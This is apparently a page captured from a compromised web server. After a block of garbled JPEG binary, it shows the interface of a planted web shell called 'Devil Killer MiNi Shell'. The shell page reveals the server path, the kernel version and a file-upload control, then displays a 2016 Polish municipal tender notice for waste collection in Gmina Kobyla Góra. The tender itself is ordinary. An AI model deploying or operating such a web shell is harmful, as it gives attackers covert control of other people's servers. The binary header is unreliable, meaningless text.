JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160427/104568-N-2016.html

<p class="kh_header"><b>Kobyla Góra: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Kobyla Góra</b><br>
<b>Numer ogłoszenia: 104568 - 2016; data zamieszczenia: 27.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobyla Góra , Plac Wiosny Ludów 1, 63-507 Kobyla Góra, woj. wielkopolskie, tel. 062 7316283, 7316402, faks 962 7316283, 7316402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kobyla-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Kobyla Góra.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Z A D A N I E  1: 2.1. Przedmiotem Zamówienia jest usługa polegająca na odbieraniu i zagospodarowaniu odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy, od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady komunalne oraz z nieruchomości, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, z terenu gminy Kobyla Góra oraz wyposażenie wszystkich właścicieli nieruchomości w pojemniki na odpady zgodnie z: Uchwałą Nr XXII/137/12 Rady Gminy Kobyla Góra z dnia 28 grudnia 2012 r., Uchwałą Nr XXII/134/12 Rady Gminy Kobyla Góra z dnia 28 grudnia 2012 r.,Uchwałą Nr XXII/136/12 Rady Gminy Kobyla Góra z dnia 28 grudnia 2012 r., Uchwałą Nr V/37/15 Rady Gminy Kobyla Góra z dnia 7 kwietnia 2015 r., Uchwałą Nr V/36/15 Rady Gminy Kobyla Góra z dnia 7 kwietnia 2015 r., Wykaz uchwał stanowią Załączniki nr 11-15 do SIWZ. 2.2.Odpady będą odbierane z terenu gminy zgodnie z załączonym wykazem nieruchomości. 2.3.Szczegółowy wykaz nieruchomości zlokalizowanych na terenie gminy łącznie z liczbą i rodzajem pojemników na odpady stanowi Załącznik nr 1 do SIWZ. 2.4.Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie: 2.4.1.Niesegregowanych (zmieszanych) odpadów komunalnych o kodzie 20 03 01. 2.4.2.Segregowanych odpadów komunalnych z podziałem na następujące frakcje: a) Zmieszane odpady opakowaniowe o kodzie 15 01 06 (papier, metal, tworzywa sztuczne, opakowania wielomateriałowe); b) Opakowania ze szkła o kodzie 15 01 07; c) Opakowania z tworzyw sztucznych o kodzie 15 01 02; d) Zużyte baterie i akumulatory o kodzie 20 01 34; e) Popioły o kodzie z grupy 20. 2.4.3. Przeterminowanych leków o kodzie 20 01 32 z aptek - szczegółowy wykaz aptek stanowi Załącznik nr 3 do SIWZ. 2.4.4. Innych odpadów nie ulegających biodegradacji o kodzie  20 02 03 (cmentarze). 2.5.  Odpady komunalne będą odbierane z następujących pojemników: 2.5.1. Niesegregowane (zmieszane) odpady komunalne o kodzie 20 03 01: a) w zabudowie jednorodzinnej - pojemniki o pojemności 0,12 m3 (120 l) lub 0,24m3 (240 l), b)  w zabudowie wielorodzinnej- pojemniki o pojemności od 0,12 m3 do 7,0 m3  (7000 l); c) w zabudowie niezamieszkałej - pojemniki od 0,12 m3 (120 l) do KP-7 (7 m3)  d) na nieruchomościach, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, wykorzystywane jedynie przez część roku -  pojemnik o pojemności 0,12 m3 (120l) lub 0,24 m3 (240l)2.5.2. Segregowane odpady komunalne: a) w zabudowie jednorodzinnej - pojemniki na odpady suche o pojemności 0,24 m3  (240 l), pojemniki na szkło w formie zmieszanej 0,12 m3 (120 l), pojemnik na popiół o pojemności 0,12 m3 (120 l), b) w zabudowie wielorodzinnej oraz gniazdach ogólnodostępnych - pojemniki na odpady suche o pojemności 2,5 m3 (2500 l), pojemniki na szkło  o pojemności 1,5m3, c) w zabudowie niezamieszkałej - pojemniki na odpady suche o pojemności  0,24 m3 (240 l) i 2,5 m3 (2500l); pojemnik na popiół o pojemności 0,12 m3 (120 l), pojemniki na szkło o pojemności 0,12 m3 (120l) i 1,5 m3 (1500l), d) na nieruchomościach, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, wykorzystywane jedynie przez część roku - pojemniki na odpady suche o pojemności 0,24 m3 (240 l), pojemnik na szkło w formie zmieszanej 0,12 m3 (120l), pojemnik na popiół o pojemności 0,12 m3 (120 l), 2.5.3 Inne odpady nieulegające biodegradacji o kodzie 20 02 03 - na cmentarzach, na terenach ogrodów działkowych, na posesjach należących do związków wyznaniowych oraz na posesjach zarządzanych przez jednostki administracji specjalnych - pojemniki o pojemności 1,1 m3 oraz kontenery KP-6 (6000l) i KP-7 (7000l), 2.6. Odpady komunalne będą odbierane z pojemników wyłącznie do tego celu przeznaczonych, oznaczonych w odrębny od siebie sposób: a) z przeznaczeniem na odpady suche, b) z przeznaczeniem na szkło, c) z przeznaczeniem na niesegregowane (zmieszane) odpady komunalne, d) z przeznaczeniem na popiół, e) z przeznaczeniem na tworzywa sztuczne w gniazdach ogólnodostępnych i w zabudowie wielorodzinnej - pojemniki z siatki, f) z przeznaczeniem na szkło w gniazdach ogólnodostępnych  i w zabudowie wielorodzinnej - pojemniki typu IGLOO. 2.7. Wykonawca wyposaży wskazane przez Zamawiającego nieruchomości w pojemniki zgodnie       z Załącznikiem nr 1 do SIWZ z zachowaniem zasad określonych w pkt. 2.5. i 2.6. Zamawiający zastrzega, iż objęcie wszystkich mieszkańców nieruchomości systemem odbioru odpadów komunalnych powinno nastąpić najpóźniej w terminie do dnia 30.06.2016 r. Ogółem planowana ilość pojemników do wyposażenia poszczególnych nieruchomości na terenie Gminy Kobyla Góra to: L.p.,Rodzaj pojemnika,Planowana ilość ( sztuki ); 1.Pojemnik 120L, na odpady komunalne, 1600; 2.Pojemnik 240L, na odpady komunalne, 500; 3.Pojemnik 1100L na odpady komunalne, 90; 4.Pojemnik 120L na szkło przydomowe, 2100; 5.Pojemnik 240L na odpady suche,2100; 6.Pojemnik IGLOO 1,5 m3 na szkło z miejsc ogólnodostępnych,8; 7.Pojemnik siatka 2,5 m3 na odpady suche z miejsc ogólnodostępnych,8; 8.Pojemnik IGLOO 1,5 m3 na szkło dla zabudowy wielorodzinnej, 6; 9.Pojemnik siatka 2,5 m3 na odpady suche dla zabudowy wielorodzinnej, 7; 10.Pojemnik na leki,2; 11.Kontenery KP-6,3; 12.Kontener KP-7, 3; 13.Pojemnik 120 l na popiół, 2100; * W tabeli założono wyposażenie w pojemniki 200 nieruchomości niezamieszkałych, na których w chwili ogłoszenia niniejszego przetargu, nie powstają odpady. 2.8.  Za utrzymanie pojemników w odpowiednim stanie technicznym i sanitarnym oraz za ich bezpieczeństwo odpowiada właściciel nieruchomości. Wszelkie roszczenia z tytułu zniszczenia, zgubienie lub kradzież pojemnika po jego przekazaniu właścicielowi Wykonawca zgłasza pod adres jego właściciela. 2.9. Dane przedstawione w Załączniku nr 1 do SIWZ nie są zależne od Zamawiającego. Podane ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego uwzględniając powstawanie nowych nieruchomości oraz migracje ludności, a także zakładanie nowych działalności gospodarczych lub ich zamykanie - procent zmian 5%. 2.10. Odpady komunalne będą odbierane z następującą częstotliwością zgodną z Uchwałą Rady Gminy Kobyla Góra: 2.10.1. Niesegregowane (zmieszane) odpady komunalne: a) Zabudowa jednorodzinna - 1 raz w miesiącu, b) Zabudowa wielorodzinna- 2 razy w miesiącu, c) Zabudowa niezamieszkała - nie rzadziej niż 1 raz w miesiącu, d) na nieruchomościach, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, wykorzystywane jedynie przez część roku - 1 raz w miesiącu. 2.10.2. Segregowane odpady komunalne: a) Odpady suche - w zabudowie jednorodzinnej, niezamieszkałej oraz na nieruchomościach, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, wykorzystywane jedynie przez część roku - 1 raz w miesiącu, b) Odpady suche w zabudowie wielorodzinnej - nie rzadziej niż dwa razy na miesiąc, c) Odpady suche w gniazdach ogólnodostępnych - nie rzadziej niż 12 razy na rok na zgłoszenie Zamawiającego, d) Opakowania szklane w zabudowie jednorodzinnej, niezamieszkałej oraz na nieruchomościach, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, wykorzystywane jedynie przez część roku - 1 raz na kwartał, e) Opakowania szklane w zabudowie wielorodzinnej - nie rzadziej niż raz na dwa miesiące, f) Opakowania szklane w gniazdach ogólnodostępnych - 12 razy na rok na zgłoszenie Zamawiającego, g) Popiół w zabudowie jednorodzinnej, niezamieszkałej oraz na nieruchomościach, na których znajdują się domki letniskowe lub inne nieruchomości wykorzystywane na cele rekreacyjno wypoczynkowe, wykorzystywane jedynie przez część roku - 1 raz w miesiącu w okresie od 1 października do 30 kwietnia. 2.10.3. Inne odpady nie ulegające biodegradacji (cmentarze) na zgłoszenie Zamawiającego - (maksymalnie 15 razy w roku). 2.11. Szacowana ilość odpadów do odbioru w trakcie realizacji przedmiotu zamówienia 1.07.2016 do 31.12.2018: L.p.,Rodzaj odpadu, Kod odpadu, Łączna ilość odpadów [Mg]; 1. Niesegregowane (zmieszane) odpady komunalne, 20 03 01, 2000; 2. Zmieszane odpady opakowaniowe, 15 01 06, 320; 3. Opakowania ze szkła, 15 01 07, 340; 4. Opakowania z tworzyw sztucznych, 15 01 02, 25; 5. Inne odpady nie ulegające biodegradacji (cmentarze), 20 02 03, 108; Z A D A N I E  N R  2: 2.12. Przedmiotem Zamówienia jest usługa polegająca na odbiorze i zagospodarowaniu odpadów komunalnych gromadzonych w Punkcie Selektywnego Zbierania Odpadów Komunalnych zlokalizowanym w PSZOK przy ul. Ceglarskiej 1 w Ostrzeszowie. 2.13. Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie odpadów: a) Przeterminowanych leków o kodzie 20 01 32; b) Chemikaliów (farby, rozpuszczalniki, oleje odpadowe) o kodach 20 01 13*, 20 01 14*,  20 01  15*, 20 01 19*, 20 01 27*, 20 01 29*; c) Zużytych baterii i akumulatorów o kodzie 20 01 34; d) Zużytego sprzętu elektrycznego i elektronicznego o kodach 20 01 23, 20 01 35*, 20 01 36; e) Odpadów wielkogabarytowych o kodzie 20 03 07; f) Odpadów budowlano - rozbiórkowych o kodach z grupy 17; g) Zużytych opon o kodzie 16 01 03; h) Odpadów zielonych o kodzie 20 02 01; i) Opakowań ze szkła o kodzie 15 01 07; j) Opakowań z tworzyw sztucznych o kodzie 15 01 02; k) Opakowań z papieru i tektury o kodzie 15 01 01; l) Popioły o kodzie z grupy 20.2.14. Wykonawca wyposaży Punkt Selektywnego Zbierania Odpadów Komunalnych w pojemniki do gromadzenia odpadów zgodnie z podziałem: a) Przeterminowane leki - pojemnik o pojemności 240 l; b) Chemikalia (farby, rozpuszczalniki, oleje odpadowe) - wyznaczone miejsce do magazynowania odpadów lub kontener; c) Zużyte baterie i akumulatory - pojemnik o pojemności 120 l; d) Zużyty sprzęt elektryczny i elektroniczny - wyznaczone miejsce do magazynowania odpadów lub kontener; e) Odpady wielkogabarytowe - wyznaczone miejsce do magazynowania odpadów lub kontener; f) Odpady budowlano - rozbiórkowe - kontener od 6 m3; g) Zużyte opony - wyznaczone miejsce do magazynowania odpadów lub kontener; h) Odpady zielone - kontener od 7 m3; i) Opakowania ze szkła - pojemnik o pojemności 1,5 m3 (typ IGLOO); j) Opakowania z tworzyw sztucznych - pojemnik o pojemności 2,5 m3 (typ SIATKA); k) Opakowania z papieru i tektury - pojemnik o pojemności 1,1 m3; l) Popioły o kodzie z grupy 20 - kontener od 6 m3. 2.15. Odpady wymienione w pkt. 2.13. będą odbierane z częstotliwością wynikającą z potrzeb z uwzględnieniem stopnia zapełnienia pojemnika. 2.16. Szacowana ilość odpadów do odbioru w trakcie realizacji przedmiotu zamówienia od 1.07.2016 do 31.12.2018:  L.p., Rodzaj odpadu, Kod odpadu,Łączna ilość odpadów [Mg]; 1. Przeterminowane leki, 20 01 32, 0,3; 2. Chemikalia, 20 01 13*, 20 01 14*,  20 01  15*, 20 01 19*, 20 01 27*, 20 01 29* 2,0; 3. Zużyte baterie i akumulatory, 20 01 34, 1,5; 4. Zużyty sprzęt elektryczny i elektroniczny, 20 01 23, 20 01 35*, 20 01 36, 5,0; 5. Odpady wielkogabarytowe, 20 03 07 25,0; 6. Odpady budowlano - rozbiórkowe grupa 17, 35,0; 7. Zużyte opony, 16 01 03, 1,0; 8. Odpady zielone, 20 02 01, 2,0; 9. Opakowania ze szkła, 15 01 07, 1,0; 10. Opakowania z tworzyw sztucznych, 15 01 02, 1,0; 11. Opakowania z papieru i tektury, 15 01 01, 1,0;  Z A D A N I E  N R  3: 2.17. Przedmiotem Zamówienia jest zbiórka odpadów wielkogabarytowych, pochodzących z gospodarstw domowych polegająca na przejeździe i załadunku odpadów zgodnie z harmonogramem. 2.18. Zadanie polega na: a) zebraniu wystawionych przed nieruchomościami następujących rodzajów odpadów: - 20 03 07  - Odpady wielkogabarytowe (wersalki, tapczany, łóżka, fotele, elementy  stolarki, okna, dywany, wykładziny);- 20 01 40  - Metale (złom); - 20 01 35 * - Zużyte urządzenia elektryczne i elektroniczne (telewizory, monitory); - 20 01 36  - Zużyte urządzenia elektryczne i elektroniczne (pralki, radia, drukarki, odkurzacze); - 20 01 23 * - Urządzenia zawierające freony (lodówki); - 16 01 03  - Zużyte opony (do rozmiaru 1250x400); - 20 01 33 * - Baterie i akumulatory; - 20 02 01  -Odpady ulegające biodegradacji (powiązane gałęzie, listwy drewniane); b) załadunku na środek transportu; c) zagospodarowaniu odebranych odpadów; d) posprzątaniu miejsc, z których odbierane są wystawione odpady. 2.19. Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty gospodarczej. 2.20. Odpady wielkogabarytowe w ramach zbiórki objazdowej będą odbierane w systemie akcyjnym raz w roku. 2.21. Termin odbioru odpadów wielkogabarytowych zostanie uzgodniony pomiędzy Zamawiającym a Wykonawcą na 3 miesiące przed planowaną zbiórką. 2.22. Wykonawca przedłoży harmonogram odbioru odpadów w terminie 30 dni przed rozpoczęciem zbiórki. I N F O R M A C J E  D O D A T K O W E : 2.23. Mapa topograficzna gminy stanowi Załącznik nr 2 do SIWZ. 2.24. Łączna liczba mieszkańców gminy na dzień 31.12.2015 r. wyniosła 6074 osób. Liczba ta stanowi podstawę do wyliczenia poziomów recyklingu i odzysku. Szacunkowa liczba gospodarstw domowych wynosi 1900. Masa odpadów komunalnych odebranych w latach 2014-2015 z podziałem na poszczególne frakcje: L.p.,Rodzaj odpadu,2014 rok,2015 rok; 1.Zmieszane odpady komunalne, 745,5, 832,2; 2.Zmieszane odpady opakowaniowe, 110,2, 129,4; 3.Opakowania szklane, 134,3, 137,3; 5.Odpady wielkogabarytowe, 100,6, 64,7; 6.Przeterminowane leki, 0,1, 0,039; 7.Zużyty sprzęt elektryczny i elektroniczny, 0, 1,5; 8.Zużyte baterie i akumulatory, 0,1, 0,1; 9.Zużyte opony, 17,4, 5; 10.Odpady budowlano - rozbiórkowe, 2,2, 10,6; 11.Odpady zielone, 0, 0; 12.Inne odpady nie ulegające biodegradacji, 44,7, 43,5; 2.25. Długość dróg gminnych przebiegających przez gminę: a) drogi bitumiczne - 68 km 815 m;b) drogi gruntowe -  98 km 654 m..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 40 000 PLN (wadium słownie: czterdzieści tysięcy 00/100 PLN). Wadium wnosi się przed upływem terminu składania ofert. 2. Wadium może być wniesione w jednej lub kilku następujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9.11.2000 o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275 ze zm.). 3. Nie dopuszcza się składania wadium w innej walucie niż PLN, zapis ten dotyczy również wadium złożonego w innej formie niż w pieniądzu. 4. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, gwarancja /poręczenie musi być gwarancją/poręczeniem nieodwołalnym, bezwarunkowym i płatnym na pierwsze pisemne żądanie Zamawiającego, musi być wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) / poręczyciela oraz wskazanie ich siedzib, 2) określenie wierzytelności, która ma być zabezpieczona gwarancją / poręczeniem 3) kwotę gwarancji / poręczenia; 4) termin ważności gwarancji / poręczenia 5) zobowiązanie gwaranta/poręczyciela do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w przypadku zaistnienia przesłanek, o których mowa w art. 46 ust. 4a i 5 Pzp. 5. Wykonawca jest zobowiązany zabezpieczyć ofertę wadium na cały okres związania ofertą. 6. Wykonawca, który nie zabezpieczy oferty dopuszczalną formą wadium, zostanie wykluczony z postępowania, a jego oferta odrzucona. 7. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: 58 8413 0000 0127 7751 2000 0003 z adnotacją: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Kobyla Góra. Uwaga: za datę wniesienia wadium uważa się datę wpływu środków na wskazany rachunek bankowy. 8. Wadium wniesione w innej formie niż pieniądz musi być złożone w oryginale i wystawione na zamawiającego. 9. Wadium wnoszone w jednej z form opisanych w pkt. 11.2. 2)-5) SIWZ należy złożyć w oryginale, na adres podany do składania ofert najpóźniej w terminie składania ofert, zgodnie z pkt. XI. 1 SIWZ, w osobnej kopercie oznaczonej według zapisów pkt. X.6 SIWZ, z dopiskiem: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Kobyla Góra. Za skuteczne wniesienie wadium w jednej z form opisanych w pkt. 11.2. 2)-5) SIWZ Zamawiający uzna wadium, które w oznaczonym terminie składania Ofert znajdować się będzie w siedzibie Zamawiającego. 10. Zamawiający dokona zwrotu wadium, w przypadkach i na zasadach określonych w art. 46 ust 1- 2 i 4. 11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej o której mowa w art. 24 ust. 2 pkt 5 lub informacji, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli przedstawi: a)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dn. 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz.U. z 2016 r. poz. 250); b)	aktualne zezwolenie na transport, odzysk bądź unieszkodliwienie odpadów komunalnych zgodnie z wymogami Ustawy z dn. 14 grudnia 2012 o odpadach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał/wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie  co najmniej 1 usługę polegającą na odbieraniu odpadów komunalnych z nieruchomości, w ilości nie mniejszej niż 2 000 Mg lub na kwotę brutto nie mniejszą niż 500 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
